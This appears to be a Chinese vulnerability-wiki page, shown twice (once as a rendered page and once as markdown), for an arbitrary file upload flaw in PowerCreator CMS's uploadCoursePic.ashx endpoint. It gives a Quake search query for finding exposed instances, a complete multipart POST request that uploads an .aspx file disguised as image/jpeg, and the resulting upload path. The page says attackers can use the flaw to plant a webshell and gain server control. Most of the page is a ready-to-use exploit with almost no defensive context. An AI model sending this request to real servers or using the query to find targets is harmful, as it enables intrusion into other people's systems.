fofamini-wiki

登录白背景

源码

PowerCreator CMS uploadCoursePic存在任意文件上传漏洞

一、漏洞简介

北京翰博尔信息技术股份有限公司（简称PowerCreator）成立于2003年，是面向全球音视频领域提供软件开发及产品制造的国际化企业。PowerCreator CMS存在任意文件上传漏洞。攻击者可利用该漏洞上传webshell，获得服务器权限。

二、影响版本

PowerCreator CMS

三、资产测绘

quakeapp:"PowerCreator-CMS"
特征

四、漏洞复现

POST /upload/uploadCoursePic.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1517.3.1 Ddg/17.3.1
Connection: close
Content-Length: 246
Content-Disposition: form-data;name="file1";filename="poc.aspx";
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate

-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
Content-Type: image/jpeg

2etjJQglyub8ePXc0iTQlzBZk8t
-----------------------------20873900192357278038549710136--

文件上传位置

/fileManager/UploadFile/CoursePic/8ccf2f03-cea8-4ad4-b7be-81a37d0bbf1e.ASPX

原文: https://www.yuque.com/xiaokp7/ocvun2/quhhipua54l3xsac

# PowerCreator CMS uploadCoursePic存在任意文件上传漏洞

# 一、漏洞简介
北京翰博尔信息技术股份有限公司（简称PowerCreator）成立于2003年，是面向全球音视频领域提供软件开发及产品制造的国际化企业。PowerCreator CMS存在任意文件上传漏洞。攻击者可利用该漏洞上传webshell，获得服务器权限。

# 二、影响版本

- PowerCreator CMS

# 三、资产测绘

- quake`app:"PowerCreator-CMS"`
- 特征

![image.png](./img/TxoKHDNoN_AI02-I/1712730873129-7ae6c662-c8fb-456f-9813-63204d527838-517896.png)

# 四、漏洞复现
```java
POST /upload/uploadCoursePic.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1517.3.1 Ddg/17.3.1
Connection: close
Content-Length: 246
Content-Disposition: form-data;name="file1";filename="poc.aspx";
Content-Type: multipart/form-data; boundary=---------------------------20873900192357278038549710136
Accept-Encoding: gzip, deflate

-----------------------------20873900192357278038549710136
Content-Disposition: form-data; name="file1"; filename="poc.aspx"
Content-Type: image/jpeg

2etjJQglyub8ePXc0iTQlzBZk8t
-----------------------------20873900192357278038549710136--
```
![image.png](./img/TxoKHDNoN_AI02-I/1712731051499-6bc19277-f86b-4732-923f-8c2a44b5a587-598459.png)
文件上传位置
```java
/fileManager/UploadFile/CoursePic/8ccf2f03-cea8-4ad4-b7be-81a37d0bbf1e.ASPX
```
![image.png](./img/TxoKHDNoN_AI02-I/1712731094267-52e83cbe-23ef-4200-8556-f63f51740d04-675265.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/quhhipua54l3xsac>